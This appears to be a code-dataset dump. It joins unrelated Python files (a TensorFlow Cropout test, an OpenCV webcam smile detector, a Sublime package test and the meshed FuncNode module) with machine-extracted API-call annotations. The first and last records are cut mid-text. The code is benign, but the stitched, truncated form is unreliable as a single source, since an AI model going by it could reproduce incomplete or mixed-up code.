self._numerical_indices]', 'X[:, self._numerical_indices]'], {}), '(self._X[:, self._numerical_indices], X[:, self\n ._numerical_indices])\n', (14091, 14164), True, 'import fatf.utils.distances as fud\n'), ((22019, 22062), 'numpy.unique', 'np.unique', (['close_labels'], {'return_counts': '(True)'}), '(close_labels, return_counts=True)\n', (22028, 22062), True, 'import numpy as np\n'), ((22094, 22108), 'numpy.sum', 'np.sum', (['counts'], {}), '(counts)\n', (22100, 22108), True, 'import numpy as np\n'), ((22133, 22169), 'numpy.zeros', 'np.zeros', (['(self._unique_y.shape[0],)'], {}), '((self._unique_y.shape[0],))\n', (22141, 22169), True, 'import numpy as np\n'), ((17152, 17195), 'numpy.unique', 'np.unique', (['close_labels'], {'return_counts': '(True)'}), '(close_labels, return_counts=True)\n', (17161, 17195), True, 'import 
numpy as np\n'), ((17510, 17542), 'numpy.sort', 'np.sort', (['values[top_label_index]'], {}), '(values[top_label_index])\n', (17517, 17542), True, 'import numpy as np\n'), ((17886, 17929), 'numpy.array', 'np.array', (['(self._unique_y.shape[0] * [False])'], {}), '(self._unique_y.shape[0] * [False])\n', (17894, 17929), True, 'import numpy as np\n'), ((18728, 18767), 'numpy.sort', 'np.sort', (['g_top_label[g_top_label_index]'], {}), '(g_top_label[g_top_label_index])\n', (18735, 18767), True, 'import numpy as np\n'), ((22246, 22283), 'numpy.where', 'np.where', (['(self._unique_y == values[i])'], {}), '(self._unique_y == values[i])\n', (22254, 22283), True, 'import numpy as np\n'), ((18137, 18201), 'numpy.logical_or', 'np.logical_or', (['labels_filter', 'unique_y_filter'], {'out': 'labels_filter'}), '(labels_filter, unique_y_filter, out=labels_filter)\n', (18150, 18201), True, 'import numpy as np\n'), ((18627, 18653), 'numpy.max', 'np.max', (['g_top_label_counts'], {}), '(g_top_label_counts)\n', (18633, 18653), True, 'import numpy as np\n')] |
import tensorflow as tf
from noise import cropout
class CropoutTest(tf.test.TestCase):
    """Unit tests for the ``Cropout`` noise layer."""

    def setUp(self):
        # A fresh layer instance for every test case.
        self.layer = cropout.Cropout()

    def testCropProportions(self):
        """The cropped area must match the requested proportion exactly.

        For a crop proportion ``p`` on an HxW image, the layer is expected to
        copy a square of side ``floor(sqrt(H * W * p))`` pixels from the
        foreground, so the sum over an all-ones input equals the square's
        pixel count times channels times batch size.
        """
        input_shapes = [(1, 28, 28, 1), (2, 28, 28, 1),
                        (1, 28, 28, 3), (2, 28, 28, 3),
                        (2, 33, 33, 3)]
        proportions = [0.0, 0.25, 0.5, 0.75, 1.0]
        with self.cached_session(use_gpu=False):
            for shape in input_shapes:
                foreground = tf.ones(shape)
                background = tf.zeros(shape)
                for proportion in proportions:
                    result = self.layer((foreground, background), proportion)
                    side = tf.cast(
                        tf.sqrt(shape[1] * shape[2] * proportion), tf.int32)
                    expected = tf.cast(
                        side * side * shape[3] * shape[0], tf.float32)
                    self.assertEqual(tf.reduce_sum(result), expected)
| [
"tensorflow.ones",
"tensorflow.reduce_sum",
"tensorflow.sqrt",
"noise.cropout.Cropout",
"tensorflow.cast",
"tensorflow.zeros"
] | [((133, 150), 'noise.cropout.Cropout', 'cropout.Cropout', ([], {}), '()\n', (148, 150), False, 'from noise import cropout\n'), ((475, 489), 'tensorflow.ones', 'tf.ones', (['shape'], {}), '(shape)\n', (482, 489), True, 'import tensorflow as tf\n'), ((520, 535), 'tensorflow.zeros', 'tf.zeros', (['shape'], {}), '(shape)\n', (528, 535), True, 'import tensorflow as tf\n'), ((784, 850), 'tensorflow.cast', 'tf.cast', (['(crop_width * crop_width * shape[3] * shape[0])', 'tf.float32'], {}), '(crop_width * crop_width * shape[3] * shape[0], tf.float32)\n', (791, 850), True, 'import tensorflow as tf\n'), ((931, 949), 'tensorflow.reduce_sum', 'tf.reduce_sum', (['res'], {}), '(res)\n', (944, 949), True, 'import tensorflow as tf\n'), ((704, 739), 'tensorflow.sqrt', 'tf.sqrt', (['(shape[1] * shape[2] * prop)'], {}), '(shape[1] * shape[2] * prop)\n', (711, 739), True, 'import tensorflow as tf\n')] |
import cv2
import numpy as np
import sys
import haar_cascade as cascade
from datetime import datetime
import os.path
output_dir = "../images"
class SmileDetectStatus:
    """Mutable state shared between the capture loop and the detector.

    Tracks the phases of a single photo session: searching for a face,
    confirming a smile, taking the photo and showing the splash screen.
    The flags/counters are mutated in place by ``Detector.detect_smiles``.
    """
    def __init__(self):
        self.begin_take_photo = False  # smile held >= 100 frames; take a photo
        self.face_found = False  # eyes + mouth seen for >= 25 frames
        self.smile_detected = False  # eyes + mouth seen for >= 50 frames
        self.restart = False  # abort this session and start over
        self.completed = False  # splash screen finished; session done
        self.photo_taken = False  # image already written to disk
        self.splash_screen = 0  # frames the white splash screen was shown
        self.no_smile_detect = 0  # consecutive frames without a smile
        self.smile_detect = 0  # consecutive frames with a smile
class Image:
    """Holds the most recent camera frame in two flavours.

    ``captured`` is the raw (mirrored) frame used for detection and for the
    saved photo; ``annotated`` is a working copy that overlays are drawn on.
    """
    def __init__(self, cap):
        # A cv2.VideoCapture-like object frames are read from.
        self.cap = cap

    def capture_image(self):
        """Read one frame from the camera and refresh both copies."""
        grabbed, frame = self.cap.read()
        # Mirror horizontally so the on-screen preview behaves like a mirror.
        self.captured = cv2.flip(frame, 1)
        self.annotated = np.copy(self.captured)
class Detector:
    """Runs Haar-cascade smile detection on frames and advances the status.

    Each call to ``detect_smiles`` inspects the current frame, draws debug
    overlays, updates the frame counters/flags on ``status`` and, once a
    smile has been held long enough, writes a photo to ``output_dir``.
    """
    def __init__(self, image, status):
        # image: Image wrapper supplying .captured / .annotated frames.
        self.image = image
        # status: SmileDetectStatus instance mutated in place.
        self.status = status
    def detect_smiles(self):
        """Process the current frame: detect, annotate, update counters."""
        faces = cascade.detect_faces(self.image.captured)
        eyes_detected = False
        mouth_detected = False
        # Timestamp used to name the saved image file.
        now_str = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        for (x,y,w,h) in faces:
            eyes = cascade.detect_eyes(self.image.captured, (x,y,w,h))
            # Exactly two eyes inside a face region counts as an eye match.
            if len(eyes) == 2:
                eyes_detected = True
            mouth = cascade.detect_mouth(self.image.captured, (x,y,w,h))
            if len(mouth) == 1:
                mouth_detected = True
            # Overlay colour encodes progress: red -> yellow -> green.
            if self.status.smile_detected:
                color = (0, 255, 0)
            elif self.status.face_found:
                color = (0, 255, 255)
            else:
                color = (0,0,255)
            # ``face`` is a view into ``annotated``: drawing on it with
            # face-relative eye/mouth coordinates marks the full frame.
            face = self.image.annotated[y:y+h, x:x+w]
            cv2.rectangle(self.image.annotated, (x, y), (x+w,y+h), color, 2)
            for (ex, ey, ew, eh) in eyes:
                cv2.rectangle(face, (ex,ey), (ex+ew, ey+eh), color)
            for (ex, ey, ew, eh) in mouth:
                cv2.rectangle(face, (ex,ey), (ex+ew, ey+eh), color)
        # A sustained smile triggers exactly one photo per session; the raw
        # (un-annotated) frame is what gets written to disk.
        if self.status.begin_take_photo and not self.status.photo_taken:
            print('Taking image')
            cv2.imwrite(f'{output_dir}/img_{now_str}.jpg', self.image.captured)
            self.status.photo_taken = True
        # After the photo: show a white splash screen for a few frames, then
        # mark the session complete and request a restart.
        if self.status.photo_taken:
            self.image.annotated[:] = 255
            self.status.splash_screen += 1
            if self.status.splash_screen > 5:
                self.status.completed = True
                self.status.restart = True
        if eyes_detected and mouth_detected and not self.status.photo_taken:
            # Smile evidence: grow the streak and promote status flags at
            # 25 (face found), 50 (smile detected) and 100 (take photo).
            self.status.smile_detect += 1
            self.status.no_smile_detect = 0
            if self.status.smile_detect >= 25:
                self.status.face_found = True
            if self.status.smile_detect >= 50:
                self.status.smile_detected = True
            if self.status.smile_detect >= 100:
                print("Smile detected")
                self.status.begin_take_photo = True
        else:
            # No smile this frame: grow the miss streak; give up after 50.
            self.status.no_smile_detect += 1
            if self.status.no_smile_detect == 20:
                print("No smile was detected")
            if self.status.no_smile_detect > 50:
                self.status.restart = True
        # Refresh the preview window unless we are mid-capture; 'q' quits.
        if not self.status.begin_take_photo or len(faces) == 0 or self.status.photo_taken:
            cv2.imshow('Smile detector :)', self.image.annotated)
            if cv2.waitKey(1) & 0xFF == ord('q'):
                self.image.cap.release()
                cv2.destroyAllWindows()
                sys.exit()
def main():
    """Run the smile-detection photo booth until the user quits.

    Repeatedly: wait for a sustained smile, keep tracking it until the photo
    is triggered, then show the splash screen; a ``restart`` flag raised at
    any stage discards the session and starts a fresh one.
    """
    # Make sure the photo destination exists before the first capture.
    if not os.path.exists(output_dir):
        os.makedirs(output_dir)
    cap = cv2.VideoCapture(0)
    while True:
        status = SmileDetectStatus()
        while not status.begin_take_photo:
            # Fresh state and detector for every attempt at catching a smile.
            status = SmileDetectStatus()
            image = Image(cap)
            detector = Detector(image, status)
            # Phase 1: scan frames until a smile is confirmed (or restart).
            while not status.smile_detected:
                image.capture_image()
                detector.detect_smiles()
                if status.restart:
                    print("Restarting...")
                    break
            # Phase 2: hold the smile until the photo trigger fires.
            while status.smile_detected and not status.begin_take_photo:
                image.capture_image()
                detector.detect_smiles()
                if status.restart:
                    print("Restarting...")
                    break
        # Phase 3: take the photo and show the splash screen to completion.
        while not status.completed:
            image.capture_image()
            detector.detect_smiles()
            if status.restart:
                print("Restarting...")
                break
if __name__ == '__main__':
    main()
| [
"cv2.rectangle",
"numpy.copy",
"cv2.imwrite",
"cv2.flip",
"cv2.imshow",
"haar_cascade.detect_faces",
"datetime.datetime.now",
"cv2.destroyAllWindows",
"cv2.VideoCapture",
"sys.exit",
"haar_cascade.detect_mouth",
"cv2.waitKey",
"haar_cascade.detect_eyes"
] | [((3573, 3592), 'cv2.VideoCapture', 'cv2.VideoCapture', (['(0)'], {}), '(0)\n', (3589, 3592), False, 'import cv2\n'), ((645, 661), 'cv2.flip', 'cv2.flip', (['img', '(1)'], {}), '(img, 1)\n', (653, 661), False, 'import cv2\n'), ((687, 709), 'numpy.copy', 'np.copy', (['self.captured'], {}), '(self.captured)\n', (694, 709), True, 'import numpy as np\n'), ((872, 913), 'haar_cascade.detect_faces', 'cascade.detect_faces', (['self.image.captured'], {}), '(self.image.captured)\n', (892, 913), True, 'import haar_cascade as cascade\n'), ((1091, 1145), 'haar_cascade.detect_eyes', 'cascade.detect_eyes', (['self.image.captured', '(x, y, w, h)'], {}), '(self.image.captured, (x, y, w, h))\n', (1110, 1145), True, 'import haar_cascade as cascade\n'), ((1232, 1287), 'haar_cascade.detect_mouth', 'cascade.detect_mouth', (['self.image.captured', '(x, y, w, h)'], {}), '(self.image.captured, (x, y, w, h))\n', (1252, 1287), True, 'import haar_cascade as cascade\n'), ((1633, 1702), 'cv2.rectangle', 'cv2.rectangle', (['self.image.annotated', '(x, y)', '(x + w, y + h)', 'color', '(2)'], {}), '(self.image.annotated, (x, y), (x + w, y + h), color, 2)\n', (1646, 1702), False, 'import cv2\n'), ((2039, 2106), 'cv2.imwrite', 'cv2.imwrite', (['f"""{output_dir}/img_{now_str}.jpg"""', 'self.image.captured'], {}), "(f'{output_dir}/img_{now_str}.jpg', self.image.captured)\n", (2050, 2106), False, 'import cv2\n'), ((3263, 3316), 'cv2.imshow', 'cv2.imshow', (['"""Smile detector :)"""', 'self.image.annotated'], {}), "('Smile detector :)', self.image.annotated)\n", (3273, 3316), False, 'import cv2\n'), ((994, 1008), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (1006, 1008), False, 'from datetime import datetime\n'), ((1756, 1812), 'cv2.rectangle', 'cv2.rectangle', (['face', '(ex, ey)', '(ex + ew, ey + eh)', 'color'], {}), '(face, (ex, ey), (ex + ew, ey + eh), color)\n', (1769, 1812), False, 'import cv2\n'), ((1867, 1923), 'cv2.rectangle', 'cv2.rectangle', (['face', '(ex, ey)', '(ex + ew, 
ey + eh)', 'color'], {}), '(face, (ex, ey), (ex + ew, ey + eh), color)\n', (1880, 1923), False, 'import cv2\n'), ((3424, 3447), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (3445, 3447), False, 'import cv2\n'), ((3464, 3474), 'sys.exit', 'sys.exit', ([], {}), '()\n', (3472, 3474), False, 'import sys\n'), ((3332, 3346), 'cv2.waitKey', 'cv2.waitKey', (['(1)'], {}), '(1)\n', (3343, 3346), False, 'import cv2\n')] |
from unittest import TestCase
from sublime_lib import ResourcePath
from package_util import TemporaryPackage
class TestTemporaryPackage(TestCase):
    """Tests for the ``TemporaryPackage`` helper context manager."""

    def test_temporary_package_name(self):
        """An explicitly named package exists inside the context and is
        removed after it exits."""
        expected_resource_path = ResourcePath('Packages/TemporaryPackageTest')
        expected_file_path = expected_resource_path.file_path()
        name = 'TemporaryPackageTest'
        with TemporaryPackage(name) as path:
            # ``assertEquals`` is a deprecated alias that was removed in
            # Python 3.12; use ``assertEqual``.
            self.assertEqual(path.name, name)
            self.assertEqual(path, expected_resource_path)
            self.assertTrue(expected_file_path.is_dir())
        self.assertFalse(expected_file_path.exists())

    def test_temporary_package_prefix_suffix(self):
        """A generated name honours the requested prefix and suffix."""
        prefix = 'TemporaryPackage'
        suffix = 'Test'
        with TemporaryPackage(prefix=prefix, suffix=suffix) as path:
            self.assertTrue(path.name.startswith(prefix))
            self.assertTrue(path.name.endswith(suffix))

    def test_temporary_package_arguments_error(self):
        """An explicit name cannot be combined with a prefix or a suffix."""
        with self.assertRaises(ValueError):
            TemporaryPackage('TemporaryPackageTest', prefix='foo')
        with self.assertRaises(ValueError):
            TemporaryPackage('TemporaryPackageTest', suffix='foo')

    def test_temporary_package_exclusive(self):
        """Creating a second package with an existing name raises
        FileExistsError."""
        with TemporaryPackage('TemporaryPackageTest'):
            with self.assertRaises(FileExistsError):
                with TemporaryPackage('TemporaryPackageTest'):
                    pass
| [
"sublime_lib.ResourcePath",
"package_util.TemporaryPackage"
] | [((227, 272), 'sublime_lib.ResourcePath', 'ResourcePath', (['"""Packages/TemporaryPackageTest"""'], {}), "('Packages/TemporaryPackageTest')\n", (239, 272), False, 'from sublime_lib import ResourcePath\n'), ((389, 411), 'package_util.TemporaryPackage', 'TemporaryPackage', (['name'], {}), '(name)\n', (405, 411), False, 'from package_util import TemporaryPackage\n'), ((766, 812), 'package_util.TemporaryPackage', 'TemporaryPackage', ([], {'prefix': 'prefix', 'suffix': 'suffix'}), '(prefix=prefix, suffix=suffix)\n', (782, 812), False, 'from package_util import TemporaryPackage\n'), ((1047, 1101), 'package_util.TemporaryPackage', 'TemporaryPackage', (['"""TemporaryPackageTest"""'], {'prefix': '"""foo"""'}), "('TemporaryPackageTest', prefix='foo')\n", (1063, 1101), False, 'from package_util import TemporaryPackage\n'), ((1159, 1213), 'package_util.TemporaryPackage', 'TemporaryPackage', (['"""TemporaryPackageTest"""'], {'suffix': '"""foo"""'}), "('TemporaryPackageTest', suffix='foo')\n", (1175, 1213), False, 'from package_util import TemporaryPackage\n'), ((1276, 1316), 'package_util.TemporaryPackage', 'TemporaryPackage', (['"""TemporaryPackageTest"""'], {}), "('TemporaryPackageTest')\n", (1292, 1316), False, 'from package_util import TemporaryPackage\n'), ((1392, 1432), 'package_util.TemporaryPackage', 'TemporaryPackage', (['"""TemporaryPackageTest"""'], {}), "('TemporaryPackageTest')\n", (1408, 1432), False, 'from package_util import TemporaryPackage\n')] |
"""
Base functionality of meshed
"""
from collections import Counter
from dataclasses import dataclass, field
from functools import partial
from typing import Callable, MutableMapping, Iterable, Union, Sized, Sequence
from i2 import Sig, call_somewhat_forgivingly
from meshed.util import ValidationError, NameValidationError, mk_func_name
from meshed.itools import add_edge
def underscore_func_node_names_maker(func: Callable, name=None, out=None):
    """Resolve the ``(name, out)`` identifiers for a func node.

    Resolution order:

    #. values passed explicitly are used as-is;
    #. if only ``out`` is missing it becomes ``'_' + name``;
    #. if only ``name`` is missing it becomes ``mk_func_name(func)``;
    #. if both are missing, ``mk_func_name(func)`` is used for ``out`` and
       the same string suffixed with an underscore for ``name``.

    This naming convention eases the construction of function networks in
    which one function's output is consumed by another function through an
    argument of the same name.
    """
    if name is not None and out is not None:
        return name, out
    try:
        derived_name = mk_func_name(func)
    except NameValidationError as err:
        # Enrich the original message with a pointer to the workaround.
        suggestion = (
            '\nSuggestion: You might want to specify a name explicitly in '
            'FuncNode(func, name=name) instead of just giving me the func as is.'
        )
        raise NameValidationError(err.args[0] + suggestion)
    if name is None and out is None:
        return derived_name + '_', derived_name
    if out is None:
        return name, '_' + name
    return derived_name, out
def basic_node_validator(func_node):
    """Validates a func node. Raises ValidationError if something wrong. Returns None.
    Validates:
    * that the ``func_node`` params are valid, that is, if not ``None``
        * ``func`` should be a callable
        * ``name`` and ``out`` should be ``str``
        * ``bind`` should be a ``Dict[str, str]``
    * that the names (``.name``, ``.out`` and all ``.bind.values()``)
        * are valid python identifiers (alphanumeric or underscore not starting with
          digit)
        * are not repeated (no duplicates)
    * that ``.bind.keys()`` are indeed present as params of ``.func``
    """
    _func_node_args_validation(
        func=func_node.func, name=func_node.name, bind=func_node.bind, out=func_node.out
    )
    names = [func_node.name, func_node.out, *func_node.bind.values()]
    # All names must be strings.
    names_that_are_not_strings = [name for name in names if not isinstance(name, str)]
    if names_that_are_not_strings:
        names_that_are_not_strings = ', '.join(map(str, names_that_are_not_strings))
        raise ValidationError(f'Should be strings: {names_that_are_not_strings}')
    # Make sure there's no name duplicates
    _duplicates = duplicates(names)
    if _duplicates:
        raise ValidationError(f'{func_node} has duplicate names: {_duplicates}')
    # Make sure all names are identifiers
    _non_identifiers = list(filter(lambda name: not name.isidentifier(), names))
    if _non_identifiers:
        raise ValidationError(f'{func_node} non-identifier names: {_non_identifiers}')
    # Making sure all src_name keys are in the function's signature.
    # Previously enforced with ``assert``, which is silently skipped under
    # ``python -O`` and raises AssertionError instead of the documented
    # ValidationError; raise ValidationError unconditionally instead.
    bind_names_not_in_sig_names = func_node.bind.keys() - func_node.sig.names
    if bind_names_not_in_sig_names:
        raise ValidationError(
            f"some bind keys weren't found as function argnames: "
            f"{', '.join(bind_names_not_in_sig_names)}"
        )
# TODO: Think of the hash more carefully.
# TODO: Think of the hash more carefully.
@dataclass
class FuncNode:
    """A function wrapper that makes the function amenable to operating in a network.
    :param func: Function to wrap
    :param name: The name to associate to the function
    :param bind: The {func_argname: external_name,...} mapping that defines where
        the node will source the data to call the function.
        This only has to be used if the external names are different from the names
        of the arguments of the function.
    :param out: The variable name the function should write it's result to
    Like we stated: `FuncNode` is meant to operate in computational networks.
    But knowing what it does will help you make the networks you want, so we commend
    your curiousity, and will oblige with an explanation.
    Say you have a function to multiply numbers.
    >>> def multiply(x, y):
    ...     return x * y
    And you use it in some code like this:
    >>> item_price = 3.5
    >>> num_of_items = 2
    >>> total_price = multiply(item_price, num_of_items)
    What the execution of `total_price = multiply(item_price, num_of_items)` does is
    - grab the values (in the locals scope -- a dict), of ``item_price`` and ``num_of_items``,
    - call the multiply function on these, and then
    - write the result to a variable (in locals) named ``total_price``
    `FuncNode` is a function wrapper that specification of such a
    `output = function(...inputs...)` assignment statement
    in such a way that it can carry it out on a `scope`.
    A `scope` is a `dict` where the function can find it's input values and write its
    output values.
    For example, the `FuncNode` form of the above statement would be:
    >>> func_node = FuncNode(
    ...     func=multiply,
    ...     bind={'x': 'item_price', 'y': 'num_of_items'})
    >>> func_node
    FuncNode(item_price,num_of_items -> multiply_ -> multiply)
    Note the `bind` is a mapping **from** the variable names of the wrapped function
    **to** the names of the scope.
    That is, when it's time to execute, it tells the `FuncNode` where to find the values
    of its inputs.
    If an input is not specified in this `bind` mapping, the scope
    (external) name is supposed to be the same as the function's (internal) name.
    The purpose of a `FuncNode` is to source some inputs somewhere, compute something
    with these, and write the result somewhere. That somewhere is what we call a
    scope. A scope is a dictionary (or any mutuable mapping to be precise) and it works
    like this:
    >>> scope = {'item_price': 3.5, 'num_of_items': 2}
    >>> func_node(scope) # see that it returns 7.0
    7.0
    >>> scope # but also wrote this in the scope
    {'item_price': 3.5, 'num_of_items': 2, 'multiply': 7.0}
    Consider ``item_price,num_of_items -> multiply_ -> multiply``.
    See that the name of the function is used for the name of its output,
    and an underscore-suffixed name for its function name.
    That's the default behavior if you don't specify either a name (of the function)
    for the `FuncNode`, or a `out`.
    The underscore is to distinguish from the name of the function itself.
    The function gets the underscore because this favors particular naming style.
    You can give it a custom name as well.
    >>> FuncNode(multiply, name='total_price', out='daily_expense')
    FuncNode(x,y -> total_price -> daily_expense)
    If you give an `out`, but not a `name` (for the function), the function's
    name will be taken:
    >>> FuncNode(multiply, out='daily_expense')
    FuncNode(x,y -> multiply -> daily_expense)
    If you give a `name`, but not a `out`, an underscore-prefixed version of
    the `name` will be taken:
    >>> FuncNode(multiply, name='total_price')
    FuncNode(x,y -> total_price -> _total_price)
    Note: In the context of networks if you want to reuse a same function
    (say, `multiply`) in multiple places
    you'll **need** to give it a custom name because the functions are identified by
    this name in the network.
    """
    func: Callable
    name: str = field(default=None)
    bind: dict = field(default_factory=dict)
    out: str = field(default=None)
    func_label: str = field(default=None)  # TODO: Integrate more
    write_output_into_scope: bool = True  # TODO: Do we really want to allow False?
    # Pluggable strategies: how (name, out) are derived, and how the node is validated.
    names_maker: Callable = underscore_func_node_names_maker
    node_validator: Callable = basic_node_validator
    def __post_init__(self):
        _func_node_args_validation(func=self.func, name=self.name, out=self.out)
        # Derive the final (name, out) pair (default: the underscore naming scheme).
        self.name, self.out = self.names_maker(self.func, self.name, self.out)
        self.__name__ = self.name
        # self.__name__ = self.name
        # The wrapped function's signature will be useful
        # when interfacing with it and the scope.
        self.sig = Sig(self.func)
        # replace integer bind keys with their corresponding name
        self.bind = _bind_where_int_keys_repl_with_argname(self.bind, self.sig.names)
        # complete bind with the argnames of the signature
        _complete_dict_with_iterable_of_required_keys(self.bind, self.sig.names)
        _func_node_args_validation(bind=self.bind)
        # extractor pulls only this node's bound inputs out of a scope dict.
        self.extractor = partial(_mapped_extraction, to_extract=self.bind)
        if self.func_label is None:
            self.func_label = self.name
        self.node_validator(self)
    def synopsis_string(self):
        return f"{','.join(self.bind.values())} -> {self.name} " f'-> {self.out}'
    def __repr__(self):
        return f'FuncNode({self.synopsis_string()})'
    def call_on_scope(self, scope: MutableMapping):
        """Call the function using the given scope both to source arguments and write
        results.
        Note: This method is only meant to be used as a backend to __call__, not as
        an actual interface method. Additional control/constraints on read and writes
        can be implemented by providing a custom scope for that."""
        # Extract just the bound inputs, then split them into (args, kwargs).
        relevant_kwargs = dict(self.extractor(scope))
        args, kwargs = self.sig.args_and_kwargs_from_kwargs(relevant_kwargs)
        output = call_somewhat_forgivingly(
            self.func, args, kwargs, enforce_sig=self.sig
        )
        if self.write_output_into_scope:
            scope[self.out] = output
        return output
    def _hash_str(self):
        """Design idea.
        Attempt to construct a hash that reflects the actual identity we want.
        Need to transform to int. Only identifier chars alphanumerics and underscore
        and space are used, so could possibly encode as int (for __hash__ method)
        in a way that is reverse-decodable and with reasonable int size.
        """
        return ';'.join(self.bind) + '::' + self.out
    # TODO: Find a better one
    def __hash__(self):
        return hash(self._hash_str())
    def __call__(self, scope):
        """Deprecated: Don't use. Might be a normal function with a signature"""
        return self.call_on_scope(scope)
    @classmethod
    def has_as_instance(cls, obj):
        """Verify if ``obj`` is an instance of a FuncNode (or specific sub-class).
        The usefulness of this method is to not have to make a lambda with isinstance
        when filtering.
        >>> FuncNode.has_as_instance(FuncNode(lambda x: x))
        True
        >>> FuncNode.has_as_instance("I am not a FuncNode: I'm a string")
        False
        """
        return isinstance(obj, cls)
def validate_that_func_node_names_are_sane(func_nodes: Iterable[FuncNode]):
    """Assert that the names of func_nodes are sane.
    That is:
    * are valid dot (graphviz) names (we'll use str.isidentifier because lazy)
    * All the ``func.name`` and ``func.out`` are unique
    * more to come (TODO)...
    """
    func_nodes = list(func_nodes)
    node_names = [fn.name for fn in func_nodes]
    outs = [fn.out for fn in func_nodes]
    assert all(
        map(str.isidentifier, node_names)
    ), f"some node names weren't valid identifiers: {node_names}"
    assert all(
        map(str.isidentifier, outs)
    ), f"some return names weren't valid identifiers: {outs}"
    # Uniqueness across both name pools: 2 * len(func_nodes) distinct strings expected.
    all_names = node_names + outs
    if len(set(all_names)) != len(all_names):
        counts = Counter(all_names)
        offending_names = [name for name, count in counts.items() if count > 1]
        raise ValueError(
            f'Some of your node names and/or outs where used more than once. '
            f"They shouldn't. These are the names I find offensive: {offending_names}"
        )
def _mk_func_nodes(func_nodes):
    """Yield each element as a ``FuncNode``, wrapping bare callables on the fly."""
    # TODO: Take care of names (or track and take care if collision)
    for obj in func_nodes:
        if is_func_node(obj):
            yield obj
            continue
        if isinstance(obj, Callable):
            yield FuncNode(obj)
            continue
        raise TypeError(f"Can't convert this to a FuncNode: {obj}")
def _func_nodes_to_graph_dict(func_nodes):
    """Build the adjacency dict linking source names -> func nodes -> out names."""
    graph = {}
    for node in func_nodes:
        # Each bound source feeds the node; the node feeds its output name.
        for src_name in node.bind.values():
            add_edge(graph, src_name, node)
        add_edge(graph, node, node.out)
    return graph
def is_func_node(obj) -> bool:
    """
    >>> is_func_node(FuncNode(lambda x: x))
    True
    >>> is_func_node("I am not a FuncNode: I'm a string")
    False
    """
    # Deliberately weaker than isinstance(obj, FuncNode): while developing, the
    # FuncNode class object may be redefined (without relaunching the python
    # kernel), making isinstance fail on "stale" instances. So we match on the
    # class name anywhere in the mro instead.
    # TODO: Replace with isinstance(obj, FuncNode) when development stabilizes.
    # return isinstance(obj, FuncNode)
    cls = type(obj)
    if cls is type:  # obj is itself a (plain) class, not an instance
        return False
    return any(getattr(base, '__name__', '') == 'FuncNode' for base in cls.mro())
def is_not_func_node(obj) -> bool:
    """
    >>> is_not_func_node(FuncNode(lambda x: x))
    False
    >>> is_not_func_node("I am not a FuncNode: I'm a string")
    True
    """
    # Complement of FuncNode.has_as_instance; handy as a filter predicate.
    verdict = FuncNode.has_as_instance(obj)
    return not verdict
def get_init_params_of_instance(obj):
    """Get names of instance object ``obj`` that are also parameters of the
    ``__init__`` of its class"""
    init_param_names = Sig(type(obj)).names
    return {k: v for k, v in vars(obj).items() if k in init_param_names}
def ch_func_node_attrs(fn, **new_attrs_values):
    """Returns a copy of the func node with some of it's attributes changed
    >>> def plus(a, b):
    ...     return a + b
    ...
    >>> def minus(a, b):
    ...     return a - b
    ...
    >>> fn = FuncNode(func=plus, out='sum')
    >>> fn.func == plus
    True
    >>> fn.name == 'plus'
    True
    >>> new_fn = ch_func_node_attrs(fn, func=minus)
    >>> new_fn.func == minus
    True
    >>> new_fn.synopsis_string() == 'a,b -> plus -> sum'
    True
    >>>
    >>>
    >>> newer_fn = ch_func_node_attrs(fn, func=minus, name='sub', out='difference')
    >>> newer_fn.synopsis_string() == 'a,b -> sub -> difference'
    True
    """
    init_params = get_init_params_of_instance(fn)
    # Refuse attribute names the FuncNode constructor wouldn't accept.
    unknown_params = new_attrs_values.keys() - init_params
    if unknown_params:
        raise ValueError(
            f'These are not params of {type(fn).__name__}: '
            f'{unknown_params}'
        )
    return FuncNode(**dict(init_params, **new_attrs_values))
def _keys_and_values_are_strings_validation(d: dict):
    """Raise ``ValidationError`` if any key or value of ``d`` is not a ``str``."""
    for key, value in d.items():
        # Check the key first, then the value (keeps the original error order).
        for item in (key, value):
            if not isinstance(item, str):
                raise ValidationError(f'Should be a str: {item}')
def _func_node_args_validation(
    *, func: Callable = None, name: str = None, bind: dict = None, out: str = None
):
    """Validates the four first arguments that are used to make a ``FuncNode``.
    Namely, if not ``None``,
    * ``func`` should be a callable
    * ``name`` and ``out`` should be ``str``
    * ``bind`` should be a ``Dict[str, str]``, ``Dict[int, str]`` or ``List[str]``
    * ``out`` should be a str
    """
    def _require(condition, message):
        # Small local helper: raise a ValidationError unless condition holds.
        if not condition:
            raise ValidationError(message)
    if func is not None:
        _require(isinstance(func, Callable), f'Should be callable: {func}')
    if name is not None:
        _require(isinstance(name, str), f'Should be a str: {name}')
    if bind is not None:
        _require(isinstance(bind, dict), f'Should be a dict: {bind}')
        _keys_and_values_are_strings_validation(bind)
    if out is not None:
        _require(isinstance(out, str), f'Should be a str: {out}')
def _old_mapped_extraction(extract_from: dict, key_map: dict):
"""Deprecated: Old version of _mapped_extraction.
for every (k, v) of key_map whose v is a key of extract_from, yields
(v, extract_from[v])
Meant to be curried into an extractor, and wrapped in dict.
>>> extracted = _old_mapped_extraction(
... {'a': 1, 'b': 2, 'c': 3}, # extract_from
... {'A': 'a', 'C': 'c', 'D': 'd'} # note that there's no 'd' in extract_from
... )
>>> dict(extracted)
{'a': 1, 'c': 3}
"""
for k, v in key_map.items():
if v in extract_from:
yield v, extract_from[v]
def _mapped_extraction(src: dict, to_extract: dict):
"""for every (desired_name, src_name) of to_extract whose v is a key of source,
yields (desired_name, source[src_name])
It's purpose is to extract inputs from a src.
The names used in the src may be different from those desired by the function,
those to_extract specifies what to extract by a {desired_name: src_name, ...}
map.
_mapped_extraction_ is mant to be curried into an extractor.
>>> extracted = _mapped_extraction(
... src={'A': 1, 'B': 2, 'C': 3},
... to_extract={'a': 'A', 'c': 'C', 'd': 'D'} # note that there's no 'd' here
... )
>>> dict(extracted)
{'a': 1, 'c': 3}
"""
for desired_name, src_name in to_extract.items():
if src_name in src:
yield desired_name, src[src_name]
def duplicates(elements: Union[Iterable, Sized]):
    """Return the list of elements that occur more than once (empty list if none)."""
    counts = Counter(elements)
    # If every element is distinct, the Counter has as many keys as elements.
    if len(counts) == len(elements):
        return []
    return [element for element, count in counts.items() if count > 1]
def _bind_where_int_keys_repl_with_argname(bind: dict, names: Sequence[str]) -> dict:
"""
:param bind: A bind dict, as used in FuncNode
:param names: A sequence of strings
:return: A bind dict where integer keys were replaced with the corresponding
name from names.
>>> bind = {0: 'a', 1: 'b', 'c': 'x', 'd': 'y'}
